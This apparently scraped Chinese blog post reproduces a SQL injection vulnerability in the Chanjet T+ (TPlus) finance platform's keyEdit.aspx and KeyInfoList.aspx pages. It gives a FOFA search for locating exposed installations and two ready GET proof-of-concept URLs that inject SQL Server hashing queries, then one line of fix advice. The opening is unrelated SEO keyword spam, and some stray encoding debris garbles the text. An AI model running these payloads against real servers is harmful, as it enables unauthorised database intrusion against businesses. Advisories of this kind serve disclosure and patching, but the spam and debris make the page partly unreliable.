西安凡高网络,推广关键词如何优化,十堰秦楚网主页,全国信用企业公示平台官网前言
免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产品简介
畅捷通-TPlus是一个为中小企业设计的财税云服务平台提供财务、税务管理和发票处理功能支持低代码开发帮助企业实现数字化和智能化经营管理。
二、漏洞描述
该系统的keyEdit.aspx、KeyInfoList.aspx接口存在sql注入漏洞
三、影响范围
未知
四、复现环境
FOFA
app畅捷通-TPlus五、漏洞复现
1.访问存在漏洞的网站
2.直接以GET方式请求
POC1:
http://127.0.0.1/tplus/UFAQD/KeyInfoList.aspx?preload1zt)AND1IN(SELECTsys.fn_varbintohexstr(hashbytes(MD5,1)))--POC2
http://127.0.0.1/tplus/UFAQD/keyEdit.aspx?KeyID1%27%20and%201(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--preload13.成功
六、修复建议
关闭互联网暴露面访问的权限及时更新系统 参考链接 https://blog.csdn.net/ahhacker86/article/details/138482856 https://blog.csdn.net/wan___she__pi/article/details/137461590
